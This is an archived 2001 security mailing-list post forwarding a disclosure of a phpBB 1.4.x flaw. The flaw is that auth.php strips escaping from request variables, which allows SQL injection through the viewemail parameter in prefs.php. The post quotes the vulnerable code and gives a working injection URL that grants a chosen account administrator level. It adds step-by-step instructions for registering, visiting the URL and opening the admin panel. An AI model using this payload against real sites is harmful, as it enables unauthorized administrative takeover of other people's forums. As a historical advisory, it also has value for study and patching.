OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steve (stevesecuresolutions.org)
Date: Fri Aug 03 2001 - 19:00:17 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----Original Message-----
    From: kill-9modernhackers.com [mailto:kill-9modernhackers.com]
    Subject: phpBB 1.4.0 bug leads to easy admin privileges

    -New phpBB 1.4.x exploit
    phpBB, is an open source bulletin board created by
    the
    phpBB group. Version 1.4.x of phpBB has a variable
    input
    validation problem that can lead to limited arbitrary sql
    querys including gaining administrative access to the
    board.

    The problem lies in the fact that phpBB 1.4.x includes
    an
    algorithm in the auth.php file which removes
    backslashes
    that php automatically adds to GPC
    (Get/Post/Cookie)
    variables.

    <Example code from auth.php>

    if(get_magic_quotes_gpc() == 1)
    {
    switch($REQUEST_METHOD){
       case "POST":
          while (list ($key, $val) = each
    ($HTTP_POST_VARS)){
             if( is_array($val) ){
                array_walk($val, 'stripslashes_array', '');
                $$key = $val;}
          else{
             $$key = stripslashes($val);}
          }
       break;

    </ End example code>

    Therefore, certian php variables submitted through a
    URL
    can reach an sql query with unescaped quotes,
    which is
    not good for security reasons. In the prefs.php file
    such
    a situation exists where a user can execute an
    arbitrary
    query by supplying an certian value for the
    $viewemail
    variable.

    < Example sql query in prefs.php >
    $sql = "UPDATE users SET
    user_viewemail='$viewemail',
    user_theme='$themes', user_attachsig = '$sig',
    user_desmile = '$smile', user_html = '$dishtml',
    user_bbcode
     = '$disbbcode', user_lang = '$lang' WHERE
    (user_id = '$userdata[user_id]')";
    </ End example code >

    Example URL gives a username "l337h4x0r" level 4
    (administrative) privileges the board:

    <Example URL>

    http://sitename/phpBBfolder/prefs.php?save=1
    &viewemail=1',user_level%3D'4'%20where%
    20username%3D'l337h4x0r'%23

    </ End example URL>

    Summary:

    1. Register an account on a phpBB board version
    1.4.x .
    2. Enter above URL with the correct sitename
       and replace l337h4x0r with your username.
    3. Click on "Administration Panel" near the bottom of
    the page.

    found by: kill-9modernhacker.com
    http://www.modernhacker.com